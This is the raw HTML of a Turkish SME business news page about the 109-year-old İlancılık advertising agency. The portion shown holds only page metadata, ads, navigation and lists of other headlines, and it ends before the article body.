﻿<!DOCTYPE html>
<html lang="tr">
  <head>
        <title>İLANCILIK Reklam Ajansı, 109 yaşında</title>
    <meta charset="utf-8">
    <!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
    <meta name="description" content="&#039;İlancılık Türkiye&#039;nin ilk reklam okulu” diyen İlancılık Reklam Ajansı Başkanı Yakup Barouh ile ajansın sektörde 100 yılı aşkın süredir">
    <meta name="keywords" content="Yakup Barouh, İlancılık Reklam Ajansı">
    <meta property="fb:admins" content="">
        <meta property="og:site_name" content="İLANCILIK Reklam Ajansı, 109 yaşında">
    <meta property="og:title" content="İLANCILIK Reklam Ajansı, 109 yaşında">
    <meta property="og:description" content="&#039;İlancılık Türkiye&#039;nin ilk reklam okulu” diyen İlancılık Reklam Ajansı Başkanı Yakup Barouh ile ajansın sektörde 100 yılı aşkın süredir"> 
    <meta property="og:url" content="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html">
    <meta property="og:image" content="http://www.kobi-efor.com.tr/images/haberler/ilancilik_reklam_ajansi_109_yasinda_h7984_9a242.jpg">    <meta property="og:type" content="article">
        <meta http-equiv="refresh" content="300">    <meta name="twitter:card" content="summary_large_image">        <meta name="twitter:url" content="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html">
    <meta name="twitter:domain" content="http://www.kobi-efor.com.tr/">
    <meta name="twitter:site" content="">
    <meta name="twitter:title" content="İLANCILIK Reklam Ajansı, 109 yaşında">    <meta name="twitter:description" content="“İlancılık, Türkiye’nin ilk reklam okulu” diyen İlancılık Reklam Ajansı Başkanı Yakup Barouh ile ajansın sektörde 100 yılı aşkın süredir yaşamını sürdürebilme başarısını konuştuk. Yenilikçi ve hızlı yapısıyla dijital çağı da yakalayan ajansın ikinci şirketi digitalpanzehir’in Ajans Başkanı İlker Barouh ise “Dijital olmazsa olmaz” vurgusu yapıyor.">
    <meta name="twitter:image:src" content="http://www.kobi-efor.com.tr/images/haberler/ilancilik_reklam_ajansi_109_yasinda_h7984_9a242.jpg">        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/base.min.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/icons.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/style.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/hs.css" rel="stylesheet">
   
        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/print.css" rel="stylesheet" media="print, handheld">    <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.kobi-efor.com.tr/rss.php" />
    <link rel="shortcut icon" href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/favicon.ico">
    <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <link rel="canonical" href="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html">

     

    <!--[if gte IE 9]>
    <style type="text/css">
        .gradient {
            filter: none;
        }
    </style>
    <![endif]-->
    <!--[if IE 7]>
    <style type="text/css">
        .reklam.dikey.sol .fixed {
            margin-left:-160px;
        }
    </style>
    <![endif]-->

    <script type="text/javascript">
    var site_url   = 'http://www.kobi-efor.com.tr/';
    var tema       = 'hs-vertigo';
    var theme_path = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/';
    var ajax_url   = '_ajax/';
    var cat_limit  = '10';
    var poll_voted = '';    var comment_approved = '0';
    var doviz    = '1';
    var lazyload = '1';
    var twitter_user  = '';
    var facebook_user = 'KobiEfor';
    var popup_saat = '1';
    var arkaplan_link = '';    var hava   = '1';
    var hava_default   = 'TUXX0014';
    var namaz   = '1';
    var namaz_default   = 'istanbul';
    var superlig   = '0';

        </script>

        <!-- GOOGLE ANALITIK -->
    <script type="text/javascript">
    	var _gaq = _gaq || [];
    	_gaq.push(['_setAccount', 'UA-26224214-1']);
    	_gaq.push(['_trackPageview']);
    </script>
    <!-- GOOGLE ANALITIK -->
    

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body >



      <div class="container center shadow">
        <div class="header">
          <div id="ustkisim" class="row">
          ﻿<!-- UST REKLAM-MENU -->
        <div id="reklammenu" class="span12">
                    <div id="ustreklam" class="row-fluid">
            <div class="span12">
            <div class="reklam"><a href="http://www.kobi-efor.com.tr/banner.php?id=222" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/ESET-Kobiefor-940x90px-okul-2.jpg&w=940&h=90&q=90" width="940" height="90" style="width:940px;height: 90px;border:0" alt="banner222" /></a></div>
            </div>
          </div>
                    <div class="row-fluid">
            <div class="span12">
              <div class="ustmenu">
                <a href="http://www.kobi-efor.com.tr/m/" title="Mobil"><i class="halflings-icon phone"></i> Mobil</a>
                <a href="http://www.kobi-efor.com.tr/kunye.html" title="Künye"><i class="halflings-icon link"></i> Künye</a>
                <a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a>
                <a href="http://www.kobi-efor.com.tr/iletisim.html" title="İletişim" class="last"><i class="halflings-icon envelope"></i> İletişim</a>

                <div id="memberArea" class="pull-right"></div>
              
              </div>
            </div>
          </div>
        </div>
<!-- UST REKLAM-MENU ***************************************************** -->
<!-- LOGO REKLAM ALANI -->
        <div id="logo" class="span12">
          <div class="row-fluid">
            <div class="span3">
              <h1 class="logo"><a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_logo_190x87png.png" alt="İLANCILIK Reklam Ajansı, 109 yaşında" /></a></h1>
            </div>
            <div class="span9">
            <div class="row-fluid">
            <div class="reklam" style="margin-left: -15px;"><a href="http://www.kobi-efor.com.tr/banner.php?id=220" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/halkbankasi768x90.jpg&w=768&h=90&q=90" width="768" height="90" style="width:768px;height: 90px;border:0" alt="banner220" /></a></div>            </div>
            <div class="row-fluid line">
              <span><i class="halflings-icon time"></i> 06 Ekim 2018 Cumartesi</span>
              <a href="http://facebook.com/KobiEfor" target="_blank" title="Facebook Sayfamız"><i class="social-icon social-fb"></i> Facebook</a>
              <a href="http://twitter.com/" target="_blank" title="Twitter Sayfamız"><i class="social-icon social-tw"></i> Twitter</a>
              <a href="" target="_blank" title="Google Plus Sayfamız"><i class="social-icon social-gl"></i> Google</a>
              <a href="http://www.kobi-efor.com.tr/rss.php" target="_blank" title="RSS Servisi"><i class="social-icon social-rss"></i> RSS</a>
            </div>
            </div>
                      </div>
        </div>
<!-- LOGO REKLAM ALANI ***************************************************** -->
<!-- MENU -->
        <div id="menu" class="span12">
          <div class="row-fluid">
              <div class="anamenu span12">
              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="e7d4300bd7cc50df9cc1566dcbf181fa57f2627a" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
              <a href="http://www.kobi-efor.com.tr/" class="current darken">&nbsp;<i class="halflings-icon white home"></i>&nbsp;Ana Sayfa</a>
                <a href="http://www.kobi-efor.com.tr/hakkimizda-s4.html"> Hakkımızda</a>
                <a href="http://www.kobi-efor.com.tr/about-us-s5.html"> About Us</a>
                <a href="http://www.kobi-efor.com.tr/galeri/" class="blue"><i class="halflings-icon white picture"></i> Foto Galeri</a>
                <a href="http://www.kobi-efor.com.tr/webtv/" class="yellow"><i class="halflings-icon white film"></i> Web TV</a>
                <a href="http://www.kobi-efor.com.tr/edergi/oku/2018/10/" target="_blank"><i class="halflings-icon white book"></i> E-Dergi</a>
                <a href="http://www.kobi-efor.com.tr/edergi/" target="_blank"><i class="halflings-icon white folder-open"></i> Arşiv</a>
                <!--a href="http://www.kobi-efor.com.tr/biyografiler.html" class=""><i class="halflings-icon white book"></i> Biyografiler</a-->
                

            </div>
          </div>
            <div class="row-fluid sticky-menu">
                              <div class="kategori">
                <a href="http://www.kobi-efor.com.tr/" class="home">&nbsp;<i class="halflings-icon white home"></i>&nbsp;</a>                 
                                  <a title="KAPAK" href="http://www.kobi-efor.com.tr/kapak" id="k1"    >KAPAK</a>
<a title="ETKİNLİK" href="http://www.kobi-efor.com.tr/etkinlik" id="k38"    >ETKİNLİK</a>
<a title="SÖYLEŞİ" href="http://www.kobi-efor.com.tr/soylesi" id="k37"    >SÖYLEŞİ</a>
<a title="OSB" href="http://www.kobi-efor.com.tr/osb" id="k2"    >OSB</a>
<a title="SEKTÖR" href="http://www.kobi-efor.com.tr/sektor" id="k3"    >SEKTÖR</a>
<a title="ÜLKE" href="http://www.kobi-efor.com.tr/ulke" id="k5"    >ÜLKE</a>
<a title="AKADEMİ" href="http://www.kobi-efor.com.tr/akademi" id="k44"    >AKADEMİ</a>
<a title="DESTEK-TEŞVİK" href="http://www.kobi-efor.com.tr/destek-tesvik" id="k45"    >DESTEK-TEŞVİK</a>
<a title="YAŞAM" href="http://www.kobi-efor.com.tr/yasam" id="k47"    >YAŞAM</a>
<a title="HABERLER" href="http://www.kobi-efor.com.tr/haberler" id="k46"    >HABERLER</a>
<div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">Tüm Kategoriler</a></div> 
                                              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="e7d4300bd7cc50df9cc1566dcbf181fa57f2627a" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
                </div>
                <div class="othercat">
                  <div class="inner">
                    <div class="clearfix">
                    
                    </div>
                  </div>
                </div>
                                          
           
          <div id="katicerik" class="row-fluid"><div class="katelement kat_k1">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/gunes-bulut-arkasindan-gozuktu-yeni-ekonomi-programi-h8043.html" title="Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gunes_bulut_arkasindan_gozuktu_yeni_ekonomi_programi_h8043_1127d.jpg" alt="Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI" />
<b>Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/turkiye-sikintili-bir-gecitte-cikis-yolu-yerli-ve-milli-uretime-destek-ve-tesvikler-h8008.html" title="Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ ÜRETİME DESTEK VE TEŞVİKLER"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_sikintili_bir_gecitte_cikis_yolu_yerli_ve_milli_uretime_destek_ve_tesvikler_h8008_89894.jpg" alt="Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ ÜRETİME DESTEK VE TEŞVİKLER" />
<b>Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ’ ÜRETİME DESTEK VE TEŞVİKLER</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/100-gunluk-icraat-programi-h7901.html" title="100 Günlük İcraat Programı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/100_gunluk_icraat_programi_h7901_b21fb.jpg" alt="100 Günlük İcraat Programı" />
<b>100 Günlük İcraat Programı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/bakan-berat-albayrak-yeni-ekonomi-yaklasimini-acikladi-ekonomi-yonetiminde-istisare-h7902.html" title="Bakan Berat Albayrak, ‘Yeni Ekonomi Yaklaşımını açıkladı: EKONOMİ YÖNETİMİNDE ‘İSTİŞARE"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bakan_berat_albayrak_yeni_ekonomi_yaklasimini_acikladi_ekonomi_yonetiminde_istisare_h7902_a5270.jpg" alt="Bakan Berat Albayrak, ‘Yeni Ekonomi Yaklaşımını açıkladı: EKONOMİ YÖNETİMİNDE ‘İSTİŞARE" />
<b>Bakan Berat Albayrak, ‘Yeni Ekonomi Yaklaşımı’nı açıkladı: EKONOMİ YÖNETİMİNDE ‘İSTİŞARE’</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/sanayi-ve-teknoloji-bakani-varank-sanayicilere-12-milyar-liralik-yeni-destek-programi-devrede-h7926.html" title="Sanayi ve Teknoloji Bakanı Varank: Sanayicilere 1.2 milyar liralık yeni destek programı devrede”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanayi_ve_teknoloji_bakani_varank_sanayicilere_12_milyar_liralik_yeni_destek_programi_devrede_h7926_81f7f.jpg" alt="Sanayi ve Teknoloji Bakanı Varank: Sanayicilere 1.2 milyar liralık yeni destek programı devrede”" />
<b>Sanayi ve Teknoloji Bakanı Varank: “Sanayicilere 1.2 milyar liralık yeni destek programı devrede”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/yeni-turkiyede-baskanlik-sistemi-h7755.html" title="Yeni Türkiyede BAŞKANLIK SİSTEMİ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yeni_turkiyede_baskanlik_sistemi_h7755_d197e.jpg" alt="Yeni Türkiyede BAŞKANLIK SİSTEMİ" />
<b>Yeni Türkiye’de BAŞKANLIK SİSTEMİ</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/gundem-yapisal-reformlar-h7649.html" title="Gündem yapısal reformlar"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gundem_yapisal_reformlar_h7649_c9683.jpg" alt="Gündem yapısal reformlar" />
<b>Gündem yapısal reformlar</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/24-haziran-seciminden-sonrasi-icin-yeni-turkiye-yeni-ekonomi-h7528.html" title="24 Haziran seçiminden sonrası için quot;Yeni Türkiye Yeni Ekonomiquot;"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/24_haziran_seciminden_sonrasi_icin_yeni_turkiye_yeni_ekonomi_h7528_965fb.jpg" alt="24 Haziran seçiminden sonrası için quot;Yeni Türkiye Yeni Ekonomiquot;" />
<b>24 Haziran seçiminden sonrası için &quot;Yeni Türkiye Yeni Ekonomi&quot;</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/21-avrasya-ekonomi-zirvesi-teknoloji-ilerliyor-siyaset-geriliyor-h7459.html" title="21. Avrasya Ekonomi Zirvesi: TEKNOLOJİ İLERLİYOR SİYASET GERİLİYOR"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/21_avrasya_ekonomi_zirvesi_teknoloji_ilerliyor_siyaset_geriliyor_h7459_3f2ac.jpg" alt="21. Avrasya Ekonomi Zirvesi: TEKNOLOJİ İLERLİYOR SİYASET GERİLİYOR" />
<b>21. Avrasya Ekonomi Zirvesi: TEKNOLOJİ İLERLİYOR SİYASET GERİLİYOR</b></a>
</div>
</div></div><div class="katelement kat_k38">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/sanayi-ve-teknoloji-zirvesi-h7502.html" title="Sanayi ve Teknoloji Zirvesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanayi_ve_teknoloji_zirvesi_h7502_ffd73.jpg" alt="Sanayi ve Teknoloji Zirvesi" />
<b>Sanayi ve Teknoloji Zirvesi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/turkiye-bilisim-zirvesi-istanbulda-yapildi-bakan-ozlu-turk-sanayisi-bilisimle-buyuyebilir-h7333.html" title="Türkiye Bilişim Zirvesi, İstanbulda yapıldı. Bakan Özlü: Türk sanayisi bilişimle büyüyebilir”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_bilisim_zirvesi_istanbulda_yapildi_bakan_ozlu_turk_sanayisi_bilisimle_buyuyebilir_h7333_a37c6.jpg" alt="Türkiye Bilişim Zirvesi, İstanbulda yapıldı. Bakan Özlü: Türk sanayisi bilişimle büyüyebilir”" />
<b>Türkiye Bilişim Zirvesi, İstanbul’da yapıldı. Bakan Özlü: “Türk sanayisi bilişimle büyüyebilir”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/leasing-sektoru-adanali-kobilerle-bulustu-h7335.html" title="Leasing sektörü Adanalı KOBİlerle buluştu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/leasing_sektoru_adanali_kobilerle_bulustu_h7335_b97a8.jpg" alt="Leasing sektörü Adanalı KOBİlerle buluştu" />
<b>Leasing sektörü Adanalı KOBİ’lerle buluştu</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tbd-34-ulusal-bilisim-kurultayindan-stratejik-karar-dijital-olgunluk-seferberligi-h7127.html" title="TBD 34. Ulusal Bilişim Kurultayından stratejik karar; Dijital olgunluk seferberliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bilisimin_nabzini_tutan_tbd_34_ulusal_bilisim_kurultayindan_stratejik_karar_dijital_olgunluk_seferberligi_h7127_a5745.jpg" alt="TBD 34. Ulusal Bilişim Kurultayından stratejik karar; Dijital olgunluk seferberliği" />
<b>TBD 34. Ulusal Bilişim Kurultayı’ndan stratejik karar; Dijital olgunluk seferberliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/afyonkarahisar-3-kobi-zirvesi-yapildi-2023te-hedefimiz-500-milyar-dolar-ihracat-h7128.html" title="Afyonkarahisar 3. KOBİ Zirvesi yapıldı: 2023te hedefimiz; 500 milyar dolar ihracat”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/afyonkarahisar_3_kobi_zirvesi_yapildi_2023te_hedefimiz_500_milyar_dolar_ihracat_h7128_f8c3c.jpg" alt="Afyonkarahisar 3. KOBİ Zirvesi yapıldı: 2023te hedefimiz; 500 milyar dolar ihracat”" />
<b>Afyonkarahisar 3. KOBİ Zirvesi yapıldı: “2023’te hedefimiz; 500 milyar dolar ihracat”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tim-6-turkiye-inovasyon-ve-girisimcilik-haftasi-h7153.html" title="TİM 6. Türkiye İnovasyon ve Girişimcilik Haftası"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tim_6_turkiye_inovasyon_ve_girisimcilik_haftasi_h7153_f1b2e.jpg" alt="TİM 6. Türkiye İnovasyon ve Girişimcilik Haftası" />
<b>TİM 6. Türkiye İnovasyon ve Girişimcilik Haftası</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/sanayici-santekte-bulustu-h7016.html" title="Sanayici ‘SANTEKte buluştu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanayici_santekte_bulustu_h7016_e42c0.jpg" alt="Sanayici ‘SANTEKte buluştu" />
<b>Sanayici ‘SANTEK’te buluştu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/ege-ekonomik-forumu-umutlandirdi-turkiye-batikapi-aciliyor-h6936.html" title="Ege Ekonomik Forumu umutlandırdı. Türkiye BATIKAPI açılıyor!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ege_ekonomik_forumu_umutlandirdi_turkiye_batikapi_aciliyor_h6936_508ab.jpg" alt="Ege Ekonomik Forumu umutlandırdı. Türkiye BATIKAPI açılıyor!" />
<b>Ege Ekonomik Forumu umutlandırdı. Türkiye BATIKAPI açılıyor!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/basbakan-yardimcisi-mehmet-simsekisler-iyi-giderken-reform-yapacagiz-h6835.html" title="Başbakan Yardımcısı Mehmet Şimşek:İşler iyi giderken reform yapacağız”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/basbakan_yardimcisi_mehmet_simsekisler_iyi_giderken_reform_yapacagiz_h6835_736d6.jpg" alt="Başbakan Yardımcısı Mehmet Şimşek:İşler iyi giderken reform yapacağız”" />
<b>Başbakan Yardımcısı Mehmet Şimşek:“İşler iyi giderken reform yapacağız”</b></a>
</div>
</div></div><div class="katelement kat_k37">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/adana-valisi-mahmut-demirtas-adana-markalasma-yoluna-girdi-h8048.html" title="Adana Valisi Mahmut Demirtaş: Adana markalaşma yoluna girdi”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/adana_valisi_mahmut_demirtas_adana_markalasma_yoluna_girdi_h8048_69e5c.jpg" alt="Adana Valisi Mahmut Demirtaş: Adana markalaşma yoluna girdi”" />
<b>Adana Valisi Mahmut Demirtaş: “Adana markalaşma yoluna girdi”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/is-leasing-genel-muduru-mehmet-karakilic-is-leasing-musterilerine-destek-olmaya-devam-ediyor-h8044.html" title="İş Leasing Genel Müdürü Mehmet Karakılıç: İş Leasing müşterilerine destek olmaya devam ediyor”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/is_leasing_genel_muduru_mehmet_karakilic_is_leasing_musterilerine_destek_olmaya_devam_ediyor_h8044_14c1c.jpg" alt="İş Leasing Genel Müdürü Mehmet Karakılıç: İş Leasing müşterilerine destek olmaya devam ediyor”" />
<b>İş Leasing Genel Müdürü Mehmet Karakılıç: “İş Leasing müşterilerine destek olmaya devam ediyor”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ekonomist/turkiyede-reel-sektor-sikintisi-yasaniyor-nedeni-borcla-buyuduk-h7989.html" title="Türkiyede reel sektör sıkıntısı yaşanıyor. Nedeni: Borçla büyüdük”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyede_reel_sektor_sikintisi_yasaniyor_nedeni_borcla_buyuduk_h7989_9be85.jpg" alt="Türkiyede reel sektör sıkıntısı yaşanıyor. Nedeni: Borçla büyüdük”" />
<b>Türkiye’de reel sektör sıkıntısı yaşanıyor. Nedeni: “Borçla büyüdük”</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ajans/ilancilik-reklam-ajansi-109-yasinda-h7984.html" title="İLANCILIK Reklam Ajansı, 109 yaşında"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ilancilik_reklam_ajansi_109_yasinda_h7984_9a242.jpg" alt="İLANCILIK Reklam Ajansı, 109 yaşında" />
<b>İLANCILIK Reklam Ajansı, 109 yaşında</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/kobi-bankaciliginda-isbirligi-ve-dijitallesmeye-oncelik-veriliyor-h7878.html" title="‘KOBİ Bankacılığında işbirliği ve dijitalleşmeye öncelik veriliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobi_bankaciliginda_isbirligi_ve_dijitallesmeye_oncelik_veriliyor_h7878_9570c.jpg" alt="‘KOBİ Bankacılığında işbirliği ve dijitalleşmeye öncelik veriliyor" />
<b>‘KOBİ Bankacılığı’nda işbirliği ve dijitalleşmeye öncelik veriliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ceo/teksan-burak-basegmezler-her-sey-hayalle-baslar-h7880.html" title="TEKSAN Burak Başeğmezler: Her şey hayalle başlar”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/teksan_burak_basegmezler_her_sey_hayalle_baslar_h7880_8c026.jpg" alt="TEKSAN Burak Başeğmezler: Her şey hayalle başlar”" />
<b>TEKSAN Burak Başeğmezler: “Her şey hayalle başlar”</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ekonomist/ekonomist-profdr-selva-demiralp-ekonomik-isinma-sinyalleri-gorulmedi-h7883.html" title="Ekonomist Prof.Dr. Selva Demiralp: Ekonomik ısınma sinyalleri görülmedi”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomist_profdr_selva_demiralp_ekonomik_isinma_sinyalleri_gorulmedi_h7883_18583.jpg" alt="Ekonomist Prof.Dr. Selva Demiralp: Ekonomik ısınma sinyalleri görülmedi”" />
<b>Ekonomist Prof.Dr. Selva Demiralp: “Ekonomik ısınma sinyalleri görülmedi”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ajans/dijitalde-seviye-yukselten-ajans-levelup-h7888.html" title="Dijitalde seviye yükselten ajans; LEVELUP"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijitalde_seviye_yukselten_ajans_levelup_h7888_63bf2.jpg" alt="Dijitalde seviye yükselten ajans; LEVELUP" />
<b>Dijitalde seviye yükselten ajans; LEVELUP</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/antalya-valisi-munir-karaloglu-h7777.html" title="Antalya Valisi Münir Karaloğlu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/antalya_valisi_munir_karaloglu_h7777_2d780.jpg" alt="Antalya Valisi Münir Karaloğlu" />
<b>Antalya Valisi Münir Karaloğlu</b></a>
</div>
</div></div><div class="katelement kat_k2">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/imes-osb-yonetim-kurulu-baskani-irfan-kucukay-rekabet-gucumuzu-artirmaya-odaklandik-h7897.html" title="İMES OSB Yönetim Kurulu Başkanı İrfan Küçükay: Rekabet gücümüzü artırmaya odaklandık”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/imes_osb_yonetim_kurulu_baskani_irfan_kucukay_rekabet_gucumuzu_artirmaya_odaklandik_h7897_a8366.jpg" alt="İMES OSB Yönetim Kurulu Başkanı İrfan Küçükay: Rekabet gücümüzü artırmaya odaklandık”" />
<b>İMES OSB Yönetim Kurulu Başkanı İrfan Küçükay: “Rekabet gücümüzü artırmaya odaklandık”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/aosb-de-metrekaresi-150-liraya-arsa-h7951.html" title="AOSB#039;de metrekaresi 150 liraya arsa"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/aosb_de_metrekaresi_150_liraya_arsa_h7951_47040.jpg" alt="AOSB#039;de metrekaresi 150 liraya arsa" />
<b>AOSB&#039;de metrekaresi 150 liraya arsa</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/iscehisar-mermer-ihtisas-osbye-mermer-akademisi-h7950.html" title="İscehisar Mermer İhtisas OSBye quot;Mermer Akademisiquot;"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/iscehisar_mermer_ihtisas_osbye_mermer_akademisi_h7950_344a8.jpg" alt="İscehisar Mermer İhtisas OSBye quot;Mermer Akademisiquot;" />
<b>İscehisar Mermer İhtisas OSB’ye &quot;Mermer Akademisi&quot;</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/diyarbakir-osbde-7-bin-istihdam-h7954.html" title="Diyarbakır OSBde 7 bin istihdam"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/diyarbakir_osbde_7_bin_istihdam_h7954_41ac0.jpg" alt="Diyarbakır OSBde 7 bin istihdam" />
<b>Diyarbakır OSB’de 7 bin istihdam</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/bursaya-maden-ihtisas-osb-h7952.html" title="Bursaya Maden İhtisas OSB"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bursaya_maden_ihtisas_osb_h7952_1c52f.jpg" alt="Bursaya Maden İhtisas OSB" />
<b>Bursa’ya Maden İhtisas OSB</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/tuiosb-tarimsal-urun-isleme-ussu-h7953.html" title="TÜİOSB tarımsal ürün işleme üssü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tuiosb_tarimsal_urun_isleme_ussu_h7953_dc180.jpg" alt="TÜİOSB tarımsal ürün işleme üssü" />
<b>TÜİOSB tarımsal ürün işleme üssü</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/eskisehir-osbye-yasam-kent-h7949.html" title="Eskişehir OSBye ‘Yaşam-Kent"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/eskisehir_osbye_yasam_kent_h7949_59d57.jpg" alt="Eskişehir OSBye ‘Yaşam-Kent" />
<b>Eskişehir OSB’ye ‘Yaşam-Kent’</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/antalya-osb-yonetim-kurulu-baskani-ali-bahar-turkiyenin-en-yesil-ve-cevreci-osbsi-h7792.html" title="Antalya OSB Yönetim Kurulu Başkanı Ali Bahar; Türkiyenin en yeşil ve çevreci OSBsi”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/antalya_osb_yonetim_kurulu_baskani_ali_bahar_turkiyenin_en_yesil_ve_cevreci_osbsi_h7792_af127.jpg" alt="Antalya OSB Yönetim Kurulu Başkanı Ali Bahar; Türkiyenin en yeşil ve çevreci OSBsi”" />
<b>Antalya OSB Yönetim Kurulu Başkanı Ali Bahar; “Türkiye’nin en yeşil ve çevreci OSB’si”</b></a>
</div>
<div>
